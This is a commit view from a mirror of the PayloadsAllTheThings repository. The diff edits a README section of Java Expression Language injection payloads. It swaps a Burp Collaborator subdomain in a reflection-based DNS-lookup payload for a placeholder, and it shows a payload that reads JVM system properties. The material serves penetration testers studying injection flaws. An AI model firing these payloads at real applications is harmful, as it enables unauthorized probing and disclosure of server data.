1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-05-25 19:26:29 +02:00

Update README.md

This commit is contained in:
Swissky 2021-08-25 22:17:34 +02:00 committed by GitHub
parent 9bde75b32d
commit 7c06c9025e
Signed by: GitHub
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -153,7 +153,7 @@ ${1+1}
```java
// DNS Lookup
${"".getClass().forName("java.net.InetAddress").getMethod("getByName","".getClass()).invoke("","h3l9e5soi0090naz81tmq5ztaaaaaa.burpcollaborator.net")}
${"".getClass().forName("java.net.InetAddress").getMethod("getByName","".getClass()).invoke("","xxxxxxxxxxxxxx.burpcollaborator.net")}
// JVM System Property Lookup (ex: java.class.path)
${"".getClass().forName("java.lang.System").getDeclaredMethod("getProperty","".getClass()).invoke("","java.class.path")}